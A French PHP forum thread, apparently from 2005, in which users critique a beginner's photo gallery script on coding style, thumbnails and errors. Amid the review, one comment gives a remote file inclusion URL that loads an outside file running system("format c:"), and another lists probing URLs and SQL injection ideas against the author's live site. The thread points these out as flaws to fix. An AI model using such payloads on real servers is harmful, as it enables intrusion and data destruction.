Au contraire, si tu veux employer les doubles quotes fait comme les simples quotes :
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 29 avril 2005 à 22:10
merci beaucoup pour les corrections!
pour les simples et double quotes, je ne savais pas... mais c'est vrai que c'est logique!
mon erreur avec value='".$dir."' , c'était juste un oubli : j'avais commencé avec $_REQUEST['dir'], donc là, je crois qu'il risque d'y avoir un probleme, meme avec les doubles, et après j'ai fais des modifs et ai remplacé par $dir... d'où ce code vraiment pas beau! ;-)
et j'avais jamais pensé à faire des if (!$auth_cat) ... j'ai déjà codé un
$exemple=true;
...
if ($exemple==true) {
..
}
lol...
Encore merci! je corrigerais et ferais plus attention à mieux coder pour les prochains scripts!
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 29 avril 2005 à 21:57
mais c'est pas le client qui rame, c'est la transfert de fichier, (si le client lance un tracé povray, le chargement ne sera pas plus lent !) Donc, quand on passe un fichier de 2mo, le serveur rame aussi !
echo est plus rapide que print
parfois tu utilises des simple quotes parfois des doubles, sache que les simples sont plus rapides...
$auth_photo="true";
$auth_cat="false";
puis dans un autre fichier :
$auth_photo !== "true"
$auth_cat !== "true"
j'ai du mal à comprendre....
tu dois mettre :
$auth_photo=true"
$auth_cat=false;
puis dans un autre fichier :
!$auth_photo
!$auth_cat
c'est largement plus corect...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 29 avril 2005 à 21:37
oui, d'accord, mais je parlais surtout du fait d'afficher de grosses images, sans qu'elles soient miniaturisées... J'ai eu pas mal de potes qui m'ont dis qu c'était hyper lent (faut dire que je suis chez free, en plus ;-) ).
Là, il y a eu un grand gain de vitesse. Au lieu de charger initialement des images de 2 Mo, ca ne charge plus que 20 Ko, avec possibilité, si la photo interesse, d'afficher l'original (2 Mo). D'où ma remarque!
lol
coucou747
Messages postés12303Date d'inscriptionmardi 10 février 2004StatutMembreDernière intervention30 juillet 201244 29 avril 2005 à 21:32
"ca rame vite coté client" C'est ton upload qui rame... un serveur web peut tourner sur un p1, et il sera capable de te les redimentionner, alors le client qui génréralement à au moins un p3 gère tout ça facilement...
stroubinou
Messages postés95Date d'inscriptionmercredi 27 octobre 2004StatutMembreDernière intervention 1 décembre 2007 29 avril 2005 à 20:59
petite note :
Si vous voulez changer les caractéristiques des miniatures (changement de taille), il faut le faire dans le fichier config. Ensuite, il faudra bien evidemment supprimer toutes les miniatures existantes (dans les dossiers thumb1 et thumb2)
25 janv. 2006 à 21:27
Cette source est top et ce qui est génial c'est que l'on peut voir les améliorations apportées par cette communauté d'internautes.
Etais-tu au courant qu'il y avait un bug lié aux caractères es noms de fichiers images importées ?
Ok, les espaces sont gérés " " devient %20 ce qui est très bien, mais cela ne marche pas pour un "é", un "è" ... toutes les lettres accentuées...
Il y-a t'il qqun de compétent pour me dire pourquoi le code corrigé suivant ne marche pas ?
...
$dir=strtr($dir, "èéëàäâ", "eeeaaa");
...
Ce n'est pas la même fonction que pour l'espace (et il faudra cumuler ces 2 vérifs, j'en suis conscient) et malheureusement cela ne fonctionne pas.
Autre chose : Firefox semble + intéllo que IE car lui modifie en temps réel je ne sais pas comment dire, les nom de fichiers stockés avec des lettre accentuées (Blé.jpg ->Bl%E9.jpg) !! Malheureusement Firefox n'en est qu'à 15% des utilisateurs du net...
La solution serait de faire fonctionner la fonction ci-dessus et anticiper les erreurs possibles : une aide ?
Merci Cdrik ainsi que tous les autres
Guillaume
(kergui@club-internet.fr)
13 nov. 2005 à 17:24
http://magalerie.com?page=http://monsite.com/monprogrammehack.txt
et dans monprogrammehack.txt:
system("format c:");
13 nov. 2005 à 17:14
include ($page);
ATTENTION c'est PAS SECURE DU TOUT !!!!!
Je suis pas du tout un pro en securité php mais la ca m'a choqué (aucun filtre arg!! )
Juste pour que vous repreniez le code, sur le photo.php j'ai rajouté ca
<?php
error_reporting(E_ALL);
include("./galerie/inc/config.php");
if (isset( $_GET['page']) or $_GET['page']='') {
$act = $_GET['page'];
//Just an extra security measure
$allowed_acts = array('galerie/new.php', 'galerie/update.php', 'galerie/index.php', 'galerie', '', 'galerie/install_index.php', 'galerie/install_new.php', 'Rajouter tout les fichiers');
if (!in_array($act, $allowed_acts))
{
die("Invalid Action!");
}
$page=$path.$_GET['page'];
}
....................
Ca passe un tout petit peut mieux et ca me rassure
++
TouF
29 juil. 2005 à 07:14
12 juil. 2005 à 16:17
12 juil. 2005 à 10:39
echo '<center>[',$path,$nom_index,'galerie',$dir,'/index.php?photo_id=',$table_read,' ',"\n";
echo ']<center></td>',"\n\n\n";
ce sont les lignes qui affichent toutes les miniatures. Faut donc mettre ta condition la.
Ensuite, met un lien vers le nombre de page sous retour aux categories.
11 juil. 2005 à 16:50
4 juin 2005 à 13:36
Ah bon ? quand c'est codé correctement y'a pas de risques, tu fais une gestion avec un switch par exemple et c'est imparable, bref tout dépend comment c'est codé encore une fois.
a ++
4 juin 2005 à 12:38
Justement, y a possibilité de ne pas inclure la page dans le template, mais sur chaque page, inclure le debut et la fin du template... comme ca, les problemes de securité sont inexistants! ( sauf que j'ai pas encore eu le temps de modifier le template dans la source, mais l'utilisateur peut le faire lui meme, en attendant )
Justement, je sais que les photo.php?page=*** , niveau sécurité, c'est pas top...
4 juin 2005 à 07:21
Seul gros problème: les includes référant à des liens "http://...".
Sur certains hébergeurs (comme online.net par exemple), ces appels sont interdits pour cause de sécurité probablement.
Il faut donc faire appel à des fichiers sur le serveur (include ./monfichier) ce qui n'est pas de tout compatible avec la forme de tes scripts (puisque tu utilises les mêmes variables pour les include que pour les liens html).
C'est donc un gros point (de sécurité) à modifier. Remarque que ça aidera aussi beaucoup à la lisibilité...
Bruno
3 juin 2005 à 21:22
Comme ca, ca devrait marcher!
3 juin 2005 à 18:48
Pour moi ca ne marche pas a cause du .htaccess. Si on utilise une authetification par l'intermediaire d'apache on obtien ceci :
Warning: main(************/galerie): failed to open stream: HTTP request failed! HTTP/1.1 401 Authorization Required in /var/www/photo.php on line 27
Warning: main(): Failed opening '****************/galerie' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/photo.php on line 27
SI quelqun a une idée merci.
seb
31 mai 2005 à 20:49
Merci!
31 mai 2005 à 19:00
mais no problemo... de toute facon, les commentaires me feront avancer!!!!!
31 mai 2005 à 18:21
De retour! :)
Je viens de me repencher sur le problème, et je tourne en rond avec des erreurs de format d'image en cascade; en ligne 42,43,45,51,60... du new.php.
Mais tout semble lié, par exemple la divison par zéro en ligne 45 correspond à $hauteursource de la ligne 43, etc...
Plutot que d'encombrer le forum avec une tartine sans grand intéret de ce que j'ai pu noter, accepterais-tu un mail direct avec un détail précis?
Sinon pas de souci si tu n'en as pas le temps, on a tous des impératifs, le mien étant de finir un site avant la fin de la semaine, mais je crois que certains ont des examens, et c'est plus important :).
Cordialement
28 mai 2005 à 09:19
28 mai 2005 à 08:40
28 mai 2005 à 08:16
Merci.
28 mai 2005 à 06:16
Accceptes tu la librairie GD?
27 mai 2005 à 22:46
Je viens d'installer ces scripts sur mon serveur apache.
Malheureusement, rien ne marche: aucune photo n'est prise en compte, que ce soit quand j'en mets une dans le répertoire img/ d'une catégorie nouvellement crée ou quand je l'upload.
Je n'obtiens aucun message d'erreur.
21 mai 2005 à 18:07
21 mai 2005 à 16:20
Tu peux me donner l'url de ton site, et les noms des images qui posent probleme?
Comme ca, j'essaierais de corriger...
Ps : t'as que du jpeg dans ton dossier img, ou aussi png, gif ou autre?
21 mai 2005 à 15:48
Cette version marche mieux, mais erreurs multiples à la création de chaque image, même si l'image se crée bien...
Par exemplle:
failed to open stream: HTTP request failed! en ligne 23 de new.php
Warning: imagesx(): supplied argument is not a valid Image resource en ligne 26
Warning: imagesy(): supplied argument is not a valid Image resource en ligne 27
Warning: Division by zero en ligne 29 et 35
Warning: imagecreatetruecolor(): Invalid image dimensions en ligne 44, toujours dans new.php
Dommage, par ce que ça partait bien!!!
Cordialement
21 mai 2005 à 14:52
Je vais essayer ça de suite :)
20 mai 2005 à 21:00
Nouvelle MAJ, avec correction de certains bugs ( avec les caracteres speciaux) mais aussi ajout de nouvelles fonctions ; commentaires de photo, mail...
Bref... des nouveautés...
14 mai 2005 à 14:06
et pour les messages d'erreur, j'ai corrigé... mais pas encore mis en ligne! Entre autre (je sais plus vraiment, sauf que j'avais mis un temps fou pour corriger) y avait un problemen avec les espaces... quand une photo en avait, ca buggait (mais y avait encore autre chose... je sais plus quoi!).
Normalement, dans la prochaine version, les bugs devraient être corrigés (mais en ai-je généré de nouveaux?)... elle arrive, encore qq modifs a faire et c'est bon (ps : dsl pour le temps mis a la mise a jour, mais y a un bac et des bacs blancs a preparer... je peux pas passer tout mon temps en php, malheureusement... lol)
Voilou, merci beaucoup pour ces commentaires!
14 mai 2005 à 13:29
Pour info, je me suis apperçu que la version que j'avais n'était pas celle mise à jour, du 5 mai je crois.
Avec la nouvelle version, tout semble marcher, mis à part que chaque téléchargement de nouvelle photo se traduit par une rafale de messages d'erreurs concernant le fichier new.php; alors que la photo se trouve bien chargée par la suite.
Mais génant ce tableau d'erreurs: un utilisateur non averti abandonne...
Et autre chose: pour faire fonctionner cette version, j'ai du supprimer la ligne 7 de index.php, copy "../inc/config.php","./inc/config.php");
Est-ce normal docteur? :)
Dommage, ces erreurs à la création des nouvelles photos, le reste semblait tourner...
Cordialement
12 mai 2005 à 18:51
et si tu veux des infos sur les miniatures, moi je me suis servi de ce script : http://www.phpdebutant.org/article111.php
+++
12 mai 2005 à 18:46
Mais donc grand merci à tous pour ces infos, ça va me donner motif à chercher pour comprendre, c'est sympa.
Encore merci!!
12 mai 2005 à 18:45
Mais donc grand merci à tous pour ces infos, ça va me donner motif à chercher pour comprendre, c'est sympa.
Encore merci!!
12 mai 2005 à 18:43
Voilà qui va me faire chercher un peu, c'est le seul moyen de comprendre :-) Je vois maintenant de quel coté m'orienter, c'est sympa.
Je viendrai surveiller la suite, mais là je dois mettre un petit site en ligne rapidement, alors c'est parfait.
Encore merci à tous.
12 mai 2005 à 17:59
Ps: que c'est joli, un nouveau template pour phpcs... ca fait tout drole la premiere fois! ;-)
Et zyxel12 , reviens regulierement voir les commentaires de la source, je vais bientot mettre une mise a jour ( des commentaires, meilleur compatibilité avec les espaces, peut-etre, si j'arrive : possibilité de telecharger les photos en .zip, et faut encore que je regarde qqch niveau sécurité...)
Y a deja certaines modifs qui sont visibles sur mon site, mais en test ;-)
12 mai 2005 à 07:16
Pour ceux qui utilise wamp comme moi faut ouvrir le fichier php.ini et dé commenter la ligne...en virant le ; devant...
vala
12 mai 2005 à 07:00
a mon avis, tu ne dois pas l'avoir installée, ou qqch dans le style...
Donc, non ca n'a pas l'air d'une anerie de ta part ;-)
Enfin... je pense... moi aussi je suis débutant... qu'en pensent les autres?
12 mai 2005 à 00:54
Une question de débutant, qui va peut-être vous faire sourire, mais quelle est l'erreur, quand on obtient le message
Fatal error: Call to undefined function: imagecreatefromjpeg() in /filer/a/d/adnhlait/galerie/1/index.php on line 7
à chaque tentative d'accès à une galerie nouvellement créée???
J'imagine que c'est une simple ânerie de ma part, mais laquelle donc?
Excusez une question de débutant, et merci :)
2 mai 2005 à 21:08
La correction est faîte, je mets en ligne...
2 mai 2005 à 18:44
2 mai 2005 à 17:31
il disait qu'il a essayer en local j'imagine donc que re5271 est le nom de l'ordinateur et que c'est donc normal que tu ne sache pas te connecter dessus.
si tu vx savoir pourquoi tu tombe sur ce site avec firefox c'est parceque si tu tape un truc comme mozilla dans la barre d'adresse, firefox prend le premier resultat que donne google. pour corroborer mes dire clique sur le premier lien de http://www.google.com/search?q=re5271&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:fr:official
IE va simplement rechercher le serveur et mettre serveur introuvable si il n'en trouve pas.
2 mai 2005 à 17:04
2 mai 2005 à 16:55
Pourtant pour tous mes tests, ca marchait... comprend pas!
Je reactualise tout de suite le code!
Par contre, j'arrive pas à accéder à ton site... ca me redirige sur un autre (quais des brumes, avec pleins de caractères spéciaux... ca sur firefox, et sur ie, ca met serveur introuvable...).
Et pour les , et les points, avec echo, faut faire attention à pas se mélanger les pinceaux et mettre des , a tout bout de champs... dans une fonction, par exemple, une chaîne concaténée avec des virgules=pas beau l'avion... ;-)
2 mai 2005 à 16:50
2 mai 2005 à 16:09
2 mai 2005 à 16:08
j'ai fait un bench pour en avoir le coeur net!
Bench : 1 fois echo avec virgules, une fois avec points : 5 variables concatenees, avec du texte, 500 iterations :
TEMPS avec point : 0.080598
TEMPS avec virgule : 0.07422
Idem, mais avec 2 variables :
TEMPS avec point short : 0.03445
TEMPS avec virgule short : 0.025467
Exemple, tres simple :
$a = 'bla';
$b = 'bli';
$c = 'ble';
$d = 'blu';
$e = 'blo';
$time_start = microtime(TRUE);
for ($i = 0; $i < 5; $i++)
echo 'a : '.$a.' - '.'b : '.$b.' - '.'c : '.$c.' - '.'d : '.$d.' - '.'e : '.$e.' - ';
$time_end = microtime(TRUE);
$time = $time_end - $time_start;
echo "
TEMPS avec point : ",$time,"
";
2 mai 2005 à 14:49
2 mai 2005 à 14:01
ligne 16.
echo '
[',$path,'/',$nom_index,'/galerie/',$file,'/index.php ',$file,']',"\n";
juste pour continuer l'argumentation de vitesse... apparemment les "," sont plus lent que les "." dans les concatenations ... donc la ligne ci-dessus devrait plutot etre :
echo '
['.$path.'/'.$nom_index.'/galerie/'.$file.'/index.php '.$file.']'."\n";
Voila ... desole ... j'aurais du verifier le code avant de poster ...
a+
2 mai 2005 à 13:58
a + :-)
2 mai 2005 à 13:50
petit probleme. .. j'utilise php5 sur un serveur local (test).
le site demarre bien, j'ai creer une categorie et quand j'essaie d'aller dessus j'ai:
Warning: main(http://re5271/phpcs_photogalerie/galerie/Famille/index) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in Y:\www\phpcs_photogalerie\photo.php on line 22
voici l'url passee :
http://re5271/phpcs_photogalerie/photo.php?page=/galerie/Famille/index
Si au lieu de mettre .../index je met index.php ca passe. Et les fichiers sont bien creer en local.
Sinon j'ai ete voir sur ton site et pas mal du tout ...
merci ...
1 mai 2005 à 22:06
Ca prend du temps de remplacer tous les print par des echo et les double quotes par des simples :p
Sinon, ajout de nouvelles fonctionnalités...
C'est mieux, non? (Enfin, allez, un tout petit peu, pour me faire plaisir... stp... lol!!!)
+++
1 mai 2005 à 19:49
1 mai 2005 à 19:14
1 mai 2005 à 18:33
1 mai 2005 à 18:31
parce que ca serait plus joli une ligne :
echo '<table bgcolor="red">';
plutot que : echo '<table bgcolor=\'red\'>';
non?
1 mai 2005 à 12:52
stroubinou > Effectivement j'ai matté le code...
1 mai 2005 à 10:32
pour exploiter la faille, faut uploader en telnet
30 avril 2005 à 21:49
LOL, essaie pour voir de changer l'extension d'un fichier que tu uploades, et après regarde si le script te laisse passer ton .txt par exemple, on en reparle après ^^
30 avril 2005 à 21:43
C'est très simple j'ai vu que pour aller sur le forum la page est http://photomountain.free.fr//index.php?page=forum/forum.php. Donc je me suis dit je vais tenter http://photomountain.free.fr//index.php?page=forum/ et hop j'ai la liste des fichier. ensuite tu peux essayer les quelques fichiers. C'est dans un de ceux la que j'ai trouver l'erreur sql ca me semblait etre des fichier d'anciennes version du forum j'ai vu que tu les as bouger.
il y a aussi http://photomountain.free.fr//index.php?page=inc. je l'ai trouver toute à l'heure mais le fichier qui m'as permis de le trouver n'est plus en ligne non plus.
il y a aussi un petit soucis si on essaie http://photomountain.free.fr//?page=/forum/forum.php?cat_id=5
et on a aussi une erreur sql si on fait http://photomountain.free.fr//?page=/forum/forum.php?cat_id=dsq et ca me semble assez grave aussi si on met une clause where capable de modifier la table ca doit exister mais je ne maitrise pas assez le sql pour pondre ca maintenant. ( et meme chose voir meme pire au moment du submit pour un truc du style http://photomountain.free.fr//index.php?page=forum/forum_post.php?insert_topic_id=tatata)
dans les photos il doit y avoir aussi quelques truc exploitables. Il y a sans doute moyen de trouver des erreurs mais celle que j'ai ne me semble pas bien grave. par ex : http://photomountain.free.fr//index.php?page=galerie/zinal-2005/index.php?photo_id=
quoi que... je serait curieux de voir l'effet dans new.php si on post une variable "dir" qui est un repertoire comme ../forum/ je serait toi j'enleverrai cette variable vu que new.php est dans le repertoire voulu.
enfin ce ne sont que des failles potentielles... mais je ne les ai sans doutes pas toutes trouvées
En allant voir la source il y a sans doute moyen de trouver d'autre faille mais je n'ai pas eté la voir. (j'etais venu au depart parce que j'ai fait une soure dans le même style voila un petit temps mais j'ai toujours pas regarder la source ^^)
30 avril 2005 à 21:02
30 avril 2005 à 18:40
/galerie /galerie/cat1 /galerie/cat2 /galerie/cat3 /galerie/cat4
... à moins de tester si le dossier est bien galerie!
C'est pour cela que j'avais ajouté le chemin au fichier dans l'url, pour bloquer toute inclusion de fichier d'un autre site...
par contre, là où j'ai un problème, c'est pour des url du type :
photo.php?page=galerie/zinal-2005/index.php?photo_id=3
là ca va, ca marche, mais si je voulais passer une nouvelle info par galerie/zinal-2005/index.php? du genre : galerie/zinal-2005/index.php?photo_id=3&connect=true
ca bug :
photo.php?page=galerie/zinal-2005/index.php?photo_id=3&connect=true
le fichier à inclure sera toujours galerie/zinal-2005/index.php?photo_id=3 ... le connect=true étant interprété comme une variable pour photo.php!
c'est ici que je bloque avec les url...
30 avril 2005 à 18:22
pour les infos, bah je vois pas trop où tu bloques:
index.php?page=...&info1=...&info2=...
30 avril 2005 à 18:19
"Je ne suis pas expert mais je pense que certaine personne pourrait exploiter des adresse comme celle-ci http://photomountain.free.fr/index.php?page=forum/enigme_valid.php"
le enigme_valid.php, tu l'as trouvé comment? c'est un lien qui te l'as donné? ou t'as aspiré mon site? parce que j'ai recopié un de mes scripts (proposer des enigmes de logique, valider les réponses...) et l'ai transformé en forum. Comme le site est encore en construction, je l'avais encore sur photomountain. Donc, si tu l'as eu par un lien, j'ai oublié de le remplacer... maintenant j'ai supprilé ce fichier inutile!!!
"le plus inquiétant serait une adresse du genre http://photomountain.free.fr/index.php?page=@javascriptfr.com pour rediriger sur leur site et executer du code php de leur cru"
Sinon, pour rediriger sur un autre site (et faire des trucs pas bien ;-) ) , j'inclus n'importe quel fichier avec le chemin de mon site, par exemple : include('http://photomountain.free.fr/n'importe quelle page demandée)... Je pensais que cela suffisait...
J'avais trouvé sur www.loadation.net la possibilité de créer un tableau avec tous les fichiers du site, mais ca me convient pas, vu que je passe des infos par les url. Qu'en pensez vous?
Et pour tester le type mime du fichier, le code est dors et deja utilisé! merci beaucoup!
Ps : sibi12 pourrais tu me dire ou tu as trouvé des erreurs sql?
merci beaucoup à tous!!!!!
30 avril 2005 à 17:43
$type=$_FILES['nom_du_champ']['type'];
if($type !== 'image/pjpeg' AND $type !== 'image/jpeg')
{
//l'image n'est pas de type jpeg.
}
30 avril 2005 à 17:33
, g vu aussi des erreur dans des requete sql il y a peut etre un moyen de faire une injection.
le plus inquiétant serait une adresse du genre http://photomountain.free.fr/index.php?page=@javascriptfr.com pour rediriger sur leur site et executer du code php de leur cru. le @ ne fonctionne pas mais peut-être que d'autre caractère spéciaux bien...
30 avril 2005 à 17:28
30 avril 2005 à 16:36
Donc ca marchait pas... voici ma ligne de code,$ext etant l'extension du fichier
if ( $ext "jpg" or $ext "jpeg" or $ext = "JPEG" or $ext = "JPG") {
...
}
Sans commentaire.
Je mettrais a jour dans la soirée!
+++
30 avril 2005 à 13:56
Le rubrique photo, je l'avais mis pour dire que dans le menu, faut chercher photo et y accéder.
Sinon, le lien direct est http://photomountain.free.fr/index.php?page=/galerie
30 avril 2005 à 13:49
ne fonctionne pas ...
On peut pas voir ce que çà donne en rapidité !
JPR
30 avril 2005 à 13:34
Justement, c'est deja codé comme ca. Mais je trouve que pour une raison esthétique, sur la vue d'ensemble, c'est mieux que toutes les photos aient la même taille! Je me sers des mêmes miniatures dans la vision détaillée (à droite et à gauche de la bonne photo : précédent et suivant), et là le rapport largeur/longueur est le bon.
Donc, les miniatures sont aux bonnes dimensions, je defini juste des dimensions contantes pour le plaisir des yeux sur la vue d'ensemble. Ca peut facilement être modifié (je vais ajouter une variable dans config pour qu'on puisse dire si on le veut ou non).
30 avril 2005 à 12:06
56 K ca existe encore ?
Doit y avoir 3 dinosaures en Fr qui ont ca lol..."
Justement, c'est pour ceux qu'ont des connexions rapides qu'il faut gratter un max (et pour le serveur surtout)...
30 avril 2005 à 11:51
30 avril 2005 à 11:44
Alors pour qui on gratte qq ms ?
56 K ca existe encore ?
Doit y avoir 3 dinosaures en Fr qui ont ca lol...
Nan jplaisante autant bien coder tous de la même façon avec les bonnes règles dès le départ !
La source est correcte mais les miniatures c'est pas top il faudrait imposer une taille en px ou bien faire une condition pour les img plus haute que large afin de retrouver de belles miniatures...
30 avril 2005 à 07:05
A partir de maintenant, j'irais régulièrement sur http://www.vulgarisation-informatique.com ... Très intéressant! Et je privilégierais la vitesse des fonction! ,-)
Merci à tous les 2!
30 avril 2005 à 01:47
Mais si tu veux utiliser les doubles autant concaténer ;-)
30 avril 2005 à 01:27
30 avril 2005 à 00:20
"quand on utilises les doubles quotes, autant utiliser leurs fonctionalitées et ne pas échaper les variables..."
Au contraire, si tu veux employer les doubles quotes fait comme les simples quotes :
http://www.vulgarisation-informatique.com/optimiser-php.php
a +
29 avril 2005 à 22:10
pour les simples et double quotes, je ne savais pas... mais c'est vrai que c'est logique!
mon erreur avec value='".$dir."' , c'était juste un oubli : j'avais commencé avec $_REQUEST['dir'], donc là, je crois qu'il risque d'y avoir un probleme, meme avec les doubles, et après j'ai fais des modifs et ai remplacé par $dir... d'où ce code vraiment pas beau! ;-)
et j'avais jamais pensé à faire des if (!$auth_cat) ... j'ai déjà codé un
$exemple=true;
...
if ($exemple==true) {
..
}
lol...
Encore merci! je corrigerais et ferais plus attention à mieux coder pour les prochains scripts!
29 avril 2005 à 21:57
echo est plus rapide que print
parfois tu utilises des simple quotes parfois des doubles, sache que les simples sont plus rapides...
print "<tr valign='center'><td rowspan=2 colspan=2 align='center'>
</td></tr></form></table></center>\n";
quand on utilises les doubles quotes, autant utiliser leurs fonctionalitées et ne pas échaper les variables...
$page=$path."/galerie";
utilises :
$page=$path.'/galerie';
$auth_photo="true";
$auth_cat="false";
puis dans un autre fichier :
$auth_photo !== "true"
$auth_cat !== "true"
j'ai du mal à comprendre....
tu dois mettre :
$auth_photo=true"
$auth_cat=false;
puis dans un autre fichier :
!$auth_photo
!$auth_cat
c'est largement plus corect...
29 avril 2005 à 21:37
Là, il y a eu un grand gain de vitesse. Au lieu de charger initialement des images de 2 Mo, ca ne charge plus que 20 Ko, avec possibilité, si la photo interesse, d'afficher l'original (2 Mo). D'où ma remarque!
lol
29 avril 2005 à 21:32
29 avril 2005 à 20:59
Si vous voulez changer les caractéristiques des miniatures (changement de taille), il faut le faire dans le fichier config. Ensuite, il faudra bien evidemment supprimer toutes les miniatures existantes (dans les dossiers thumb1 et thumb2)
voila...
j'attend vos commentaires...
+++
cdrik